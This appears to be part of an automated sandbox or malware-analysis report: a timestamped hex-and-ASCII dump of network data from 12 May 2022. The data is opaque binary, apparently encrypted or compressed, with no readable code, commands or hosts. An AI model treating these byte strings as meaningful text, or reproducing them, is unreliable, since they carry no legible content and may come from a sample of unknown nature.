                                                2022-05-12 15:08:08 UTC93INData Raw: d7 4c e9 d5 80 30 a8 4d ef f7 a5 34 4b e6 84 e8 1b 88 b2 ea 15 92 73 6b 1c 60 83 ec 17 0f 2e c9 48 3a ab 2a c9 d6 49 8f 2a c8 88 22 83 f2 ac 3b 8c f9 f3 da 11 c0 f4 ea aa 14 a6 ff 4d ee b9 f0 f8 a0 03 14 6c 16 bb 8f 31 06 09 ea 65 cd dd e2 f7 da b3 38 88 25 85 0b 2b 06 f3 1e 9f 25 e0 f1 69 08 f3 dc ed 74 3e 60 d1 89 22 1f 8b bc 95 68 7a 77 4e f8 63 cb 24 73 86 2e f7 d9 d6 61 ee 07 d9 69 71 49 e3 1b e5 aa 79 ce d9 0d 35 66 64 e7 66 f7 5a a4 aa e7 43 70 77 50 2c 39 e5 53 ec fe 18 2b f5 d7 e2 1b f8 65 d7 c4 97 5a 9d e8 51 e0 b5 be 93 4f 93 74 3f 56 74 5a 3c b8 5c b3 65 ce c1 ba 15 41 1d d6 cd 8c 20 3a 4e 25 93 44 86 57 cd 83 f4 90 55 59 ce bc 72 61 15 f0 69 d9 38 6b 4b 71 47 68 c1 12 d0 b6 4b a0 b7 cb 6d 2e 69 26 e3 ae 7b 34 5a 5c e9 c7 67 54 78 76 f1 58 cd
                                                Data Ascii: L0M4Ksk`.H:*I*";Ml1e8%+%it>`"hzwNc$s.aiqIy5fdfZCpwP,9S+eZQOt?VtZ<\eA :N%DWUYrai8kKqGhKm.i&{4Z\gTxvX
                                                2022-05-12 15:08:08 UTC94INData Raw: 42 df 70 fd a9 c2 cf 48 c1 d8 5e b6 80 52 f3 98 82 38 01 8f 36 97 6b d0 74 56 84 84 ee 86 ae d3 0b 63 e6 c5 65 a2 29 48 f8 da 18 02 46 f7 00 b2 69 7c a1 9d d7 a0 62 39 75 29 7e f2 07 47 c8 d4 08 4d f9 d8 ac 44 eb 98 e2 3d 53 c1 46 cb 3d 04 49 95 70 ab 6d e3 07 86 b6 73 f9 c8 9c d8 4e 10 d5 cc b9 ab ed c5 cd d8 e7 46 4f e4 b5 15 05 48 32 51 a7 9e bf 6d ec 7e 86 6e 2d 25 02 aa 9a b7 5c 73 61 21 26 78 8f 98 e1 51 f9 03 51 93 23 77 5c 67 29 8b 9d b6 8a ec 8d 8b f4 72 2b 5b cd 95 dc 80 fb e3 30 cc b7 69 b5 3b ee c0 8c 6a f9 c2 50 cc ea d7 fe ca 70 09 8b a1 fc 50 12 f6 21 74 03 e1 1c da aa d8 0a 56 0d 33 f1 47 1e aa 81 bc 8b d2 61 eb 32 e6 dc a6 f1 48 34 08 6e 69 f5 9c ce 62 92 3e 63 f6 9a 29 c2 e1 cc 94 f9 ea dc 64 cd fd 17 3e 76 4b d6 d9 b2 e2 52 e0 e6 f0 08
                                                Data Ascii: BpH^R86ktVce)HFi|b9u)~GMD=SF=IpmsNFOH2Qm~n-%\sa!&xQQ#w\g)r+[0i;jPpP!tV3Ga2H4nib>c)d>vKR
                                                2022-05-12 15:08:08 UTC95INData Raw: 35 93 46 e8 92 f7 e9 7d 1e da 2e 79 0e 63 a3 67 c4 bc 0f 50 b6 da c8 76 68 f4 4e 65 e5 f1 d5 5b e2 59 ff 9c e0 6f cb 0f a8 68 22 a6 91 f4 0f b0 d7 dd d2 f7 cc 59 13 1b fa 64 fe 37 cb 6c 8e 82 58 c6 ee cb 4e 4f d0 01 b9 8d d9 9b 89 cc 6b 2e 28 db 06 b5 b3 45 38 58 e7 5e 3a 41 d1 6b 59 b7 1b e0 f5 57 ef c3 9c ea 7f a0 b5 85 ec 7b 8f 01 85 00 78 25 75 63 a4 5a b2 19 25 4a 51 87 3b d7 2d 23 a4 0e 74 32 74 e3 cd 51 93 16 78 bc 1a dc 13 2a 8a 03 1a ae 07 21 c3 61 34 8c 5e 54 b0 fe 91 1e e8 8a 38 04 19 28 6a 55 4f d1 20 db 0f fc 55 ca 22 4a 31 6d 9c 86 a2 37 de 6a 93 02 31 34 0e 42 ca 64 98 63 ba 7e 15 37 e4 e5 1a e9 db 80 89 4e f2 78 ee 23 f9 54 87 a8 f1 59 78 c7 3d fb 72 64 cf a4 84 b7 47 e6 cd 63 ba e6 f4 c8 79 35 71 ec ae f5 40 b7 c0 f2 47 a3 96 4c f5 13 7a
                                                Data Ascii: 5F}.ycgPvhNe[Yoh"Yd7lXNOk.(E8X^:AkYW{x%ucZ%JQ;-#t2tQx*!a4^T8(jUO U"J1m7j14Bdc~7Nx#TYx=rdGcy5q@GLz
                                                2022-05-12 15:08:08 UTC97INData Raw: 2f 3b ee 58 e7 91 7a e9 a8 18 76 7c 35 aa 93 33 9d 19 e5 73 e1 50 f1 ff da 3e 21 98 28 5b a9 07 14 fa 93 8a 3b fb c0 f9 d2 db a9 73 65 3b e2 c7 87 6e 8b 9a a2 82 7d 55 7b 4f d4 65 7c 2b 63 89 36 e0 ee 5b 78 ff e6 d4 65 ed 71 ce e4 86 44 69 d8 c7 25 e4 77 6c f8 eb 18 54 97 ae d6 88 67 a1 43 b4 37 f8 5f eb e1 3f bf fb d3 03 0a cb 19 5a d3 89 40 b3 51 71 1f 4a a1 03 4d 94 6b 3c 41 1c 38 2c 9b 40 b7 69 9d 5d ba 12 41 1a 37 ae 3c 33 1e 54 08 fd 82 e5 b9 cb ef 8f b2 80 53 e4 a2 ec 63 2a e8 7e ef c0 6b 4b af db 79 df 1b db 9c a8 a6 b4 cb f1 3f 77 33 e5 a9 e1 a9 67 48 f0 0d e2 f2 78 77 d9 d0 dc af 4b cd 50 a8 c7 5e 12 e1 ee c3 7d 39 8b 35 ba 9f 86 71 18 3d 1e ef dc 42 d0 39 32 12 67 19 6f 18 35 a1 ad 75 15 09 54 37 99 4e e8 89 69 cc 7d 0f d1 22 65 e1 67 99 78 60
                                                Data Ascii: /;Xzv|53sP>!([;se;n}U{Oe|+c6[xeqDi%wlTgC7_?Z@QqJMk<A8,@i]A7<3TSc*~kKy?w3gHxwKP^}95q=B92go5uT7Ni}"egx`
                                                2022-05-12 15:08:08 UTC97INData Raw: e1 59 e2 61 ae f6 20 ca 21 df 57 10 29 28 cc c1 78 65 35 c5 76 bf be f4 8c d9 09 f9 f3 c5 83 c2 f1 f3 a4 2e 20 10 43 d8 8f 73 f0 88 12 88 7d 13 cf a0 5e 9a 12 cd 68 ed 4c e8 e4 de 34 3a 8d 38 b4 a2 34 1a 0d 83 a2 0b ef d6 eb 20 49 d8 71 63 27 f2 df 96 7d 82 8e a7 9e 4a c2 85 4e f2 4b 46 35 7c 93 36 ed f1 57 63 eb 18 c4 43 fb 58 1d 1a 55 bd 5d ba cb 3f f7 6c 64 f6 f0 fe ab ba 88 de 8e a0 51 50 b0 2a c2 58 e3 e1 24 9f f1 d9 fd 01 cf 05 4b d5 92 49 95 db 85 e0 a4 b4 10 52 62 6a 01 5b 1b c3 05 7b 43 a0 70 19 0f ab 1a 5f 1a cc b0 1d 22 3f 51 21 86 61 e4 47 ee 94 da 5f 7e a6 31 a2 fd 7a 1a fe 74 ef 3d 6a 67 72 cc 6a c4 0d d9 9c 8f bf 49 ca dd 3d 4d 3c c2 44 e3 57 b4 42 f3 f7 59 f0 63 46 fb c4 94 ae 41 e5 9a a9 c7 45 25 e0 63 ec 77 2a 8f 39 a5 9d 8a 67 1f ab 18
                                                Data Ascii: Ya !W)(xe5v. Cs}^hL4:84 Iqc'}JNKF5|6WcCXU]?ldQP*X$KIRbj[{Cp_"?Q!aG_~1zt=jgrjI=M<DWBYcFAE%cw*9g
                                                2022-05-12 15:08:08 UTC99INData Raw: 65 d3 71 43 8e 08 f5 95 d4 15 0b 4f e0 d9 6a a0 20 d0 5c e5 63 d0 50 e4 0a a3 76 67 b3 0a 3a a4 5f 3b 0c 3d 77 ed 03 43 f2 d1 c4 f6 e6 cc 52 54 c2 ba 54 3f 44 11 7d f4 23 11 50 89 ea a9 61 ed 10 69 b1 77 09 d8 94 c9 f7 49 dd d3 a0 90 40 c1 dc d4 d0 b6 b0 e5 9f 70 5e 4f 23 5d 2e 9a b1 60 e8 f9 dc 7f 27 3f ef a7 a7 bd 5b 69 2d a0 24 7e e0 b1 ea 4d 0d 15 e7 89 56 31 55 4f 8b 85 80 a3 a8 d5 9d 81 e7 9a b0 64 dc 95 d0 be 7b af 33 ca 99 78 9a 3a e4 dd 3e c5 fa b1 6d e5 c9 d1 ed c8 c3 1b 89 ad 93 00 19 e9 37 9b 0a dc 01 a4 93 f1 b4 54 1c 3d c8 63 71 95 8a 94 b6 c3 69 c9 b7 67 c3 b1 8d 01 35 19 62 70 ef 6a a0 88 9c 37 41 11 95 0c e0 f5 96 6b 0c 06 c8 40 f0 f7 17 25 a2 5d 39 d5 89 37 56 fe fd fd 08 82 a7 f6 f4 b3 d2 46 37 65 ba ce e6 e1 de d9 38 51 37 3b cc eb 77
                                                Data Ascii: eqCOj \cPvg:_;=wCRTT?D}#PaiwI@p^O#].`'?[i-$~MV1UOd{3x:>m7T=cqig5bpj7Ak@%]97VF7e8Q7;w
                                                2022-05-12 15:08:08 UTC100INData Raw: de 73 70 e3 c1 7c f1 e0 d5 d6 f5 44 3d 06 2d 7e ce 15 1c e5 3b b4 95 6e c2 a1 d2 c1 66 7a d5 48 19 19 4e ed fb 28 c8 52 03 93 5d d3 f7 d9 d5 4a fd 91 b6 9b 43 92 01 d4 67 38 b5 d9 0b bb b6 45 bf 58 e4 97 b8 06 4d 7a 5d 0a 05 fe 7e 5a fb aa 9c f0 6e ac 6b 30 b9 2b 8f 0b 86 b4 6b a3 d6 18 6a 73 2a 13 28 68 28 96 3b dd 2e 5f 6a 1e 70 10 d9 3d e8 7e a4 2b 50 2d 12 cf 1d 2a 88 b6 09 76 18 04 a1 63 1e 2b 54 2e b2 cd 87 3e 16 d5 38 0e c5 eb 7b f2 94 c2 23 f9 18 d3 7c a3 20 4a 3b e1 d0 86 05 8b f6 8c 8e 02 3b 39 1d 44 cb b2 37 b7 ab 72 04 3e da db f6 26 20 88 93 ea f2 78 38 29 27 57 b9 96 fc 61 51 ec c7 fa 72 73 c8 93 ba 49 46 c0 14 7a af c9 eb d9 2b 24 71 fd a3 ea 5b 49 c1 de 4d b2 eb 57 e4 15 a2 39 01 8e 37 9b 7a dc 7f 49 8e 18 e4 ba c6 eb 0c 62 ec c8 8b b1 27
                                                Data Ascii: sp|D=-~;nfzHN(R]JCg8EXMz]~Znk0+kjs*(h(;._jp=~+P-*vc+T.>8{#| J;;9D7r>& x8)'WaQrsIFz+$q[IMW97zIb'
                                                2022-05-12 15:08:08 UTC101INData Raw: 7e e6 dd 30 26 98 44 39 b9 2c 19 e3 94 12 3b f9 ce ee 1e 6f cd 76 7a 23 69 44 87 7a 9c 89 a5 16 73 5d 9a 5a ee ff 46 32 63 8c 33 74 ff 4d 6f f7 38 2a 49 e4 49 7f 0a 7e a4 61 c7 48 3c e3 79 7c f1 66 f7 52 a4 bd e7 0c 70 77 50 2c 39 ed 53 f9 f7 b2 a6 e3 c7 e6 1d 7b 05 4c ca 84 53 10 d9 88 ff a8 9e 8f 5e 9c 6b b1 58 0d d9 33 97 c3 a0 7a 95 c1 ba 1d 41 16 df 33 01 36 2a 71 10 73 7c 1a 46 5e 8d e5 af a1 4f 52 ad e9 6f 38 f9 e2 e8 c4 74 68 67 47 68 c9 12 ec b6 10 a0 b7 cb 6d 2e 61 26 df a7 83 b9 4c 4c d0 fd c7 f2 78 76 6d d5 db b0 66 f3 d9 b8 c0 4b 12 d0 6e c3 77 2a 12 3b a4 93 a5 51 89 37 09 11 41 7f d4 3e 0b 0e fb 19 62 18 14 49 30 48 1b 2e b6 23 05 5f f0 9d 57 e6 fd 1e db 3d e0 0e 61 aa 5f 78 52 0a 47 a0 da c8 74 6f cd c4 e8 f1 ef dc f7 d3 dc e5 8a 7c e2 df
                                                Data Ascii: ~0&D9,;ovz#iDzs]ZF2c3tMo8*II~aH<y|fRpwP,9S{LS^kX3zA36*qs|F^ORo8thgGhm.a&LLxvmfKnw*;Q7A>bI0H.#_W=a_xRGto|
                                                2022-05-12 15:08:08 UTC102INData Raw: 2c d2 81 ea b2 78 f5 00 80 83 4d 17 c5 8d d4 2d 4e c6 c6 9b 46 4e c1 cb c1 df 94 df e6 b3 70 5c 4f 31 34 b3 96 ae 61 97 d0 dc 6e 2d 24 11 a6 8b fb 11 44 b3 be 37 7e c8 96 e0 51 f9 a3 d8 89 33 75 5d 5e 88 98 47 a7 74 58 dd 8b fe 65 bc 5e d6 8d c2 72 40 f7 23 c1 b4 70 bd 2a ef d4 07 71 e6 de 63 cc ea db f2 d2 49 90 98 a7 99 8f 02 fe 3f b3 18 f8 07 be 80 0f 19 5b 0d 30 f1 50 40 4f 89 32 3a d4 b3 d4 4d 6f 8d a0 9e 0a 26 0c 79 6b f2 9d b7 30 82 39 08 b6 9c 1b fb c8 db 9d 7d 4e c0 96 cb 0b 17 34 a2 60 f3 dc 2b 83 59 35 e0 27 0e 5e 35 b1 0a b2 ff 57 10 68 94 ee 14 08 29 51 e0 27 c1 3b c6 cb 61 79 3b c4 80 30 25 f5 3a ac 21 0f f3 da 87 c5 f7 e2 b9 28 2e fd 4e fd 17 cd f0 2e b4 b8 b9 10 2e 27 4b 40 0f 33 f4 bc 4c e2 f6 c9 2a 3e 8e b6 12 bf f1 15 e2 91 83 01 e6 c0
                                                Data Ascii: ,xM-NFNp\O14an-$D7~Q3u]^GtXe^r@#p*qcI?[0P@O2:Mo&yk09}N4`+Y5'^5Wh)Q';ay;0%:!(.N..'K@3L*>
                                                2022-05-12 15:08:08 UTC104INData Raw: 31 85 dc 1d b9 ba 53 b5 4d f5 bf 35 7b 4e 62 4f ac 14 e7 6d 5d 14 ad 66 f5 78 a8 b5 f2 5a 72 8e 0b 8d 09 6a 83 1f 0d 7e 51 9a 45 2a 62 0a e8 8d dc 24 46 4b 13 67 3c 7e 2c ec 62 45 3a 54 bf 07 dc 13 3b 9f 68 00 52 06 07 b2 4f 33 b4 0f d1 47 2d 90 79 e4 d7 38 0e 39 ef 72 aa 4e 4c 26 f1 09 27 54 d6 33 62 07 6c 8a 8c 07 a2 64 7e 8e 04 5e 67 0c 42 d6 6f 23 3f 0d 63 cf 20 32 68 26 d9 df 81 b7 4e e4 56 3a 03 ce 60 91 bb f6 4a 5d e4 a7 d1 72 75 c8 ad 93 c7 f1 dd 10 69 ac f0 ef f2 53 30 60 f9 a4 fb 5f d8 c7 c0 2e d3 b9 c5 e5 15 d2 2e 90 12 22 8a 7e 4d 64 9f ae 58 7e 8a c1 33 2a 12 dd c8 6c 67 2d 58 c3 44 21 cf 4c e1 28 37 65 6d a6 0d d5 a1 64 ea 09 2a 6e f6 1c 55 c9 10 0b ee d1 f5 ac 55 e4 98 bf 38 53 c1 63 da 12 04 43 89 34 b4 43 c4 03 97 ba 53 6c 00 9d de 2b 70
                                                Data Ascii: 1SM5{NbOm]fxZrj~QE*b$FKg<~,bE:T;hRO3G-y89rNL&'T3bld~^gBo#?c 2h&NV:`J]ruiS0`_.."~MdX~3*lg-XD!L(7emd*nUU8ScC4CSl+p
                                                2022-05-12 15:08:08 UTC105INData Raw: 76 db 08 2a ce 66 64 e7 fb a6 55 bb a6 c7 0a 70 7d c0 b0 24 ea 4c e3 e1 2c b7 99 d8 dc 95 e7 18 4b d5 98 45 8e c8 a8 e0 30 12 0f 52 9c 6b 2d 49 0a c6 29 b7 f5 1a 7a 9a 40 ab 1a 5f 0b c9 ab 10 f4 fc 51 3a 8c 7c 1a 46 d1 ac e6 b0 06 59 ce bc 1a 70 1a fe 68 f4 fb 10 4b 71 db 79 c7 16 36 97 bc 85 b1 dd d9 f8 67 39 f0 a6 c5 bf 9d de d9 dd 47 f3 73 74 f6 d2 db 21 f6 8a 78 a8 c7 5e 3d 7e 59 ed 22 3e a4 36 ae 8c 85 68 f7 36 25 03 df 68 c5 27 af af 08 35 64 07 35 59 22 ee 32 f5 80 38 99 47 e0 7c 7b ea 7f 06 d6 3d 75 07 98 b4 5d 51 b7 87 68 a0 46 d8 79 69 ef d2 7d fa 16 c2 eb f7 48 cf 91 71 7e c7 02 40 f5 1f a1 9a ef 93 a8 ce 3e c5 47 df 77 0f 26 e5 72 d1 28 c2 69 22 90 5d e2 e0 dd d2 bb d5 1e a3 bb d5 8a 8c d3 ea 17 b4 ca 02 a0 b8 45 bb 54 7e 47 23 77 e1 7a 5c a8
                                                Data Ascii: v*fdUp}$L,KE0Rk-I)z@_Q:|FYphKqy6g9Gst!x^=~Y">6h6%h'5d5Y"28G|{=u]QhFyi}Hq~@>Gw&r(i"]ET~G#wz\
                                                2022-05-12 15:08:08 UTC106INData Raw: e0 4e 9a 88 cd 00 18 67 55 4b ab 91 8e 80 a5 d5 6f 8a fe 64 44 48 c7 95 c3 bb 58 df e4 cb 9f 50 b4 2a ef c8 07 87 ff 9d 61 dc e2 c0 e7 f3 5a 1e 88 b4 98 11 02 fd 38 6b f5 f1 3a a5 86 de 22 9e 18 3b e6 2f 32 94 80 ba 92 cc 7a c8 9b f3 d7 bf 91 f5 34 24 64 66 f5 93 ce 62 92 3e 63 37 85 1f e1 cc dd 9f ec f2 29 4d cf e2 06 33 ae 5a cf 4e 8d fe 45 ed f1 d5 d2 8c b8 e6 1c 9a 85 44 1c 66 ed c2 19 1e 27 c0 5b 1c 3c 3b d7 ca 72 91 2b e4 9a b6 ba 35 b0 1b 0f d1 ca db 8d db ec 69 a6 21 26 fd 49 f4 88 71 e7 aa fd 89 51 10 98 e8 a3 65 e7 fa 72 fe 47 e2 e6 d1 35 d7 86 14 af db 10 07 f3 84 9d 2d e5 c2 f4 08 e2 d7 6d 9b 30 53 c9 87 78 ab 53 b7 8a 64 72 bc 4f f8 69 44 33 61 8a 2e e8 ff 41 6e 1f 19 f9 73 f6 40 f2 1d 51 7c 77 d1 d2 3c ed 12 43 e7 fa fd 5f af 8c 96 8e 70 71
                                                Data Ascii: NgUKodDHXP*aZ8k:";/2z4$dfb>c7)M3ZNEDf'[<;r+5i!&IqQerG5-m0SxSdrOiD3a.Ans@Q|w<C_pq
                                                2022-05-12 15:08:08 UTC108INData Raw: e3 7d 93 ee 7c bc 16 a0 4c 3b 8e 66 19 bd 0b 44 00 65 36 86 7c f8 bc d2 91 00 af e7 38 04 19 e2 71 a4 47 f9 f1 f5 09 d0 3b 8d 22 4a 3b 6a 9b 8a 6a 3a df 7f 84 2a e9 31 0c 44 ca 4c 14 b1 ba 7e 03 04 ef ec 21 00 db 80 bd 22 a9 78 32 29 fe 54 9d d4 4c 60 5b ce 15 21 76 75 c4 ad bc 79 46 ca c0 6c 9a e8 e2 f1 b1 3c 71 fb cc b1 5b 49 cb f6 91 b6 91 50 e3 04 d4 57 b1 8f 25 91 15 b9 60 49 84 0c cc 84 c8 ec 1b 6f 83 78 6d b1 2d 31 b0 d7 20 c5 57 fb 17 75 74 61 bd 0b d5 b6 4d 34 e5 d1 80 fb 1e 54 ee dd c4 f8 d1 11 ad 55 e8 90 ba 39 53 c7 5d fa 2d 00 6b 4a eb b8 6d fe 13 93 a1 5f 15 a6 2c df 21 50 ba 6a b1 83 40 e7 dc da de b8 58 8b 03 7b 4f 42 5d fd b6 97 a4 4d ea f7 cd 6a 3b 4b a1 a7 8b b1 25 ca 23 bc 3d 52 f1 a4 f1 55 e5 7b 7b 81 25 6c 3a e9 83 8f 97 96 b3 d1 a4
                                                Data Ascii: }|L;fDe6|8qG;"J;jj:*1DL~!"x2)TL`[!vuyFl<q[IPW%`Ioxm-1 WutaM4TU9S]-kJm_,!Pj@X{OB]Mj;K%#=RU{{%l:
                                                2022-05-12 15:08:08 UTC109INData Raw: 80 0e 59 17 ab ad 6b 0f 34 51 34 8f 74 cc d7 ac fc e9 b8 97 8f c2 b4 e7 41 f2 e8 54 ea f3 6d 4b 00 d7 79 ce f0 c8 96 81 b6 a4 c4 c9 5c 6a 39 fa b1 0e a7 54 58 08 dc 6b fb 40 d9 f8 c4 dc b0 4d f6 4a a9 d6 5b 26 0e ef ef 7b 28 f5 6b a2 8c 88 ff be 3b 14 02 d2 6e c2 2e 3e 3f 99 09 49 0e 07 5b a9 59 1c 2e b2 26 96 4e e6 8d 65 cc 83 1f f7 37 6a 18 75 b8 62 5c b2 01 54 af 46 c8 7c 6f f1 2c 75 cc c5 c5 4b 54 5c e5 8b 6d 78 c8 98 19 f4 33 a2 a5 1a 93 a1 d8 e8 37 6b dd 56 1a 81 37 75 fb 29 ea 89 12 93 57 f1 4f df d2 54 df 01 a6 88 4a 8a 9d dc 78 13 4a cb 2f 8b bc 28 e4 48 e2 45 47 fb 4f 7a 56 b1 7e 85 c4 44 ea a6 62 45 7d aa b7 fc 75 eb 8b 0b 87 09 56 b8 cd 0c 6f 54 a8 ed 29 4e 05 91 37 c6 37 43 6d 1e 7b 23 80 3c c4 7a b9 40 39 bd 10 cb 2e 02 85 6c 1e b0 14 24 b0
                                                Data Ascii: Yk4Q4tATmKy\j9TXk@MJ[&{(k;n.>?I[Y.&Ne7jub\TF|o,uKT\mx37kV7u)WOTJxJ/(HEGOzV~DbE}uVoT)N77Cm{#<z@9.l$
                                                2022-05-12 15:08:08 UTC110INData Raw: 5d 14 b5 9d f1 a5 52 1c 31 e9 57 e7 e6 2d be 8d c9 41 6c 99 e2 d6 a9 86 9d 46 a5 6a 6f ee bc 0e a6 93 34 60 31 03 7f 47 ce cc 9e db 56 d5 4c e9 d5 a7 36 a8 41 ce ce 33 83 2e 3b f7 fd 13 f5 f6 e1 0a b6 e1 7a 0f 6f 82 ee 17 01 0c 21 56 23 28 39 bd 81 68 6f 2e bb 24 bc 92 f7 ca aa 0b f9 f9 f2 23 d3 fb f9 a3 64 0d eb 42 f4 86 54 eb af 03 99 72 06 ba 6e 5d b6 00 e7 68 e5 64 01 f7 da 25 46 4c 39 a5 ae a7 57 f3 82 8f 39 f8 ce e4 1b fc dc 60 6a 2e 57 26 97 51 a2 98 c8 ca 63 5a 81 3d 54 61 57 3f 64 f3 56 45 ec 4a 7a c9 b6 d7 49 ee 5f a3 f7 83 44 89 ce fd 3e eb 66 75 e8 e2 18 54 97 b7 c5 f7 4e 76 50 b4 2b 6e dd fc ec 6e d2 e2 d8 fd 12 f4 1b 4b c4 97 5a 97 36 8e cc a9 b7 1e 57 9e 7a 25 61 e9 c6 2d bd 52 a6 52 76 5d ab 10 31 c5 c8 af 16 ae 2a 4d 23 83 7c 0b 49 dd aa
                                                Data Ascii: ]R1W-AlFjo4`1GVL6A3.;zo!V#(9ho.$#dBTrn]hd%FL9W9`j.W&QcZ=TaW?dVEJzI_D>fuTNvP+nnKZ6Wz%a-RRv]1*M#|I
                                                2022-05-12 15:08:08 UTC111INData Raw: 54 4a 17 89 b3 ba 7e 3d 98 e6 e5 03 f1 6f 82 bb 47 fb 6f a4 94 96 93 91 bb f6 1c 10 c5 3d ff 6d 5a d1 b4 94 58 49 d5 f1 84 a8 cf e2 e1 6d c5 8e 02 bc d6 48 46 c1 cf 42 ad bd a8 e5 39 9b 3a 7a cf 24 9b 7e d4 73 4d 58 96 a4 8a c1 e9 22 d5 ee c8 66 b3 5c 60 ea d7 24 c9 35 5b 02 a3 6d 7c a9 74 69 a7 73 36 32 81 7d f2 07 78 48 d3 d5 f6 f0 ce 3a e2 81 66 45 39 59 ba 24 f3 3c 00 5c ae f9 b7 6b e3 0d 88 80 a5 02 e5 bd dc 5a 1a d4 cc b7 f0 e6 c3 cd d4 d7 d6 3d 49 b1 7a 45 60 9c 59 b4 9d b8 2b e7 0d 23 91 32 15 02 a9 8b aa 45 73 00 42 36 58 e9 98 d8 50 f3 14 d4 a2 36 69 55 5e 8e 90 8c 4e a3 f9 b5 89 f8 e8 16 48 c7 85 c4 a0 55 6b 97 ca 9f 51 9c c3 e4 d7 1c 51 0d b1 6b c7 fd 5d bc c2 61 00 b2 54 93 11 19 de c4 65 0b fa 79 7e 96 d9 0c dc 4d 3b e0 41 62 93 9f ae 9e cc
                                                Data Ascii: TJ~=oGo=mZXImHFB9:z$~sMX"f\`$5[m|tis62}xH:fE9Y$<\kZ=IzE`Y+#2EsB6XP6iU^NHUkQQk]aTey~M;Ab
                                                2022-05-12 15:08:08 UTC113INData Raw: 7d 67 f6 ec 3f af 41 ef ca f0 c7 54 38 8b a8 c2 77 2e e1 e7 a2 8c 8a 5d 34 26 0c 00 da 46 30 21 21 12 e8 51 65 07 3d 4e a9 48 1b 19 79 35 99 44 78 db 7a c6 7f 65 9d 3c 7c 1b 79 b8 1b 82 c1 29 47 a0 46 d9 73 70 e2 92 2f c8 de c3 c7 f9 e5 98 cf 7d 7e ca 3f d2 e5 36 b2 8a ca 70 a1 d2 ca 4b 32 dd 5c 0f 1c 63 64 fc 00 21 7a 12 99 d2 80 e4 dd d0 25 93 1f b2 9f 5a 86 e6 09 0b 1b b4 ca 03 aa be 53 a4 09 b9 69 02 57 4d 70 e5 d5 51 f7 69 42 c1 83 5b ee 6e ad 95 09 35 7a 85 84 de 16 7a a9 c0 77 3c 5a b2 17 39 67 11 80 13 3e 24 4c 67 80 2d 38 7e 3f 93 32 ba 3b 7c 0b 81 a1 6a 7e 8f 6c 1a bd 0c a7 e5 64 36 8d 45 27 a9 de bf ee 87 d7 32 2c e0 f4 42 a5 59 5d 77 f1 09 d7 7c 25 22 4a 3b 45 13 86 05 80 cd 74 9f 05 26 b9 5d 42 dc 65 0c 42 ba 74 1f 24 e3 f4 02 c8 d7 bf cc b3
                                                Data Ascii: }g?AT8w.]4&F0!!Qe=NHy5Dxze<|y)GFsp/}~?6pK2\cd!z%ZSiWMpQiB[n5zzw<Z9g>$Lg-8~?2;|j~ld6E'2,BY]w|%"J;Et&]BeBt$
                                                2022-05-12 15:08:08 UTC113INData Raw: b8 ff 7d 32 d9 7f f9 c9 69 30 4f da 79 ca 0a bb 3a 92 a0 bd da f9 4c cb 3b fa bb 37 07 49 53 fc cc 43 81 cb 74 f1 ce f4 00 43 e5 4f 81 77 56 3a fa ff c6 66 27 01 73 a3 8c 8e 0a 4c 36 09 15 6a 01 05 21 21 12 c5 23 31 05 44 1c ad 59 18 38 8b 33 4f c1 ad 82 7a c4 06 56 da 3d 78 0e 6b b7 76 2b 01 08 47 aa 57 d1 00 dd e0 d2 7e c8 47 c1 c7 f9 4d e1 f9 cf 7c ce 1e 96 5b 31 a3 87 ca 23 a3 d2 ca d5 6e cc 51 82 54 66 75 f9 53 87 7b 12 97 ea b6 2a dc d2 58 fd a6 b0 9b 4f 28 9d d7 0d 29 b1 db 0e 25 e7 53 a4 4b 99 04 35 57 49 ac eb bb 10 e7 64 51 3c bf 47 fa 72 bb af d4 a0 87 70 f4 96 10 6d 7d d1 0a 6f 5d a3 02 16 04 fa 78 c4 e5 2d 4d 6d 0f 76 43 40 3c e8 70 b8 bf e9 a7 50 35 17 3b 8e 6e 1d df ab 29 b0 6e 2f e6 27 83 ba d2 9d 3e 28 d5 38 0e 3b 44 40 af 44 c9 49 3f 08
                                                Data Ascii: }2i0Oy:L;7ISCtCOwV:f'sL6j!!#1DY83OzV=xkv+GW~GM|[1#nQTfuS{*XO()%SK5WIdQ<Grpm}o]x-MmvC@<pP5;n)n/'>(8;D@DI?
                                                2022-05-12 15:08:08 UTC115INData Raw: 5f 61 09 37 73 29 6e e4 90 a6 2b c8 3e 69 2a ee 41 eb cc c8 83 99 23 d5 37 dc fc 17 30 c6 93 7d bb 75 35 41 eb dd fd 19 9b 88 e2 0a 98 fe 44 1c 66 82 ff 09 08 2a f4 4c 0f 30 2c 38 c0 45 6d 32 c3 88 b9 84 03 b5 37 0b ee f8 da 8a c9 05 f2 99 26 11 ec 69 17 9b 01 bb a1 03 8c f3 ae 8a 90 5c 89 28 e6 79 98 4c e2 f7 d2 2f 29 96 2e ae 83 70 06 f4 9a 70 2b d2 dc fc 0a 88 9f 70 65 35 f1 6f a4 74 9a 91 b3 8d 78 a4 84 62 e2 67 55 4e 3f 98 25 ec ed c5 2a e1 18 d7 32 ac 48 e3 1f f7 0c 44 fd c0 07 ff 6d 64 e0 ed 18 54 97 a6 df 87 70 70 49 4e 29 c6 48 f7 cb 34 bc e4 df eb f5 e6 38 49 c2 93 45 8b d3 71 e1 99 bc 24 5c b7 c8 2f 32 49 c7 2d b3 40 2f 20 95 5d a9 61 16 08 c9 ab 14 ab 1f 51 30 8c 6f 2a 45 c2 74 e2 b0 80 59 cf bc ff 66 09 eb 46 2b c3 6b 4b 71 ca 7d d0 f3 c9 ba
                                                Data Ascii: _a7s)n+>i*A#70}u5ADf*L0,8Em27&i\(yL/).pp+pe5otxbgUN?%*2HDmdTppIN)H48IEq$\/2I-@/ ]aQ0o*EtYfF+kKq}
                                                2022-05-12 15:08:08 UTC116INData Raw: 45 9b 3b a7 60 5b c0 17 e8 42 77 c2 93 94 49 46 c2 ca 7a b8 f5 e0 f2 71 38 76 ea 5d eb 77 4b d9 d5 4d b5 87 a8 e5 39 da 2f 0a 8e 22 83 84 dd 4e 4b a5 1b d4 69 c3 90 56 62 ec cc 46 93 25 5d 96 8b 21 cf 42 dd 00 a3 67 7e 9c 05 c4 8d 73 3c 1a 2d 7e f2 1c 46 f3 fa ce fc fe cf 52 54 c2 b2 5d 32 53 c0 78 0c 3d 28 41 94 e1 b8 6c ea fc 96 9c 59 28 cb b7 3d 23 21 88 cd b3 87 60 e3 cf dd b2 e1 4f e4 b7 50 4f 48 32 40 84 90 ae f1 f9 f3 dc 6a 2c 24 00 a4 a3 ac 4a 6c 2b cf 89 76 e0 aa ea 53 80 ab c9 80 2f 1b 08 4e 81 8b 9e 98 62 d7 8c 81 8d ea b0 48 cd 97 d1 be 40 e1 21 ce f0 91 b6 3b ee b8 6b 78 fe bb dc de ef fa cc c4 70 05 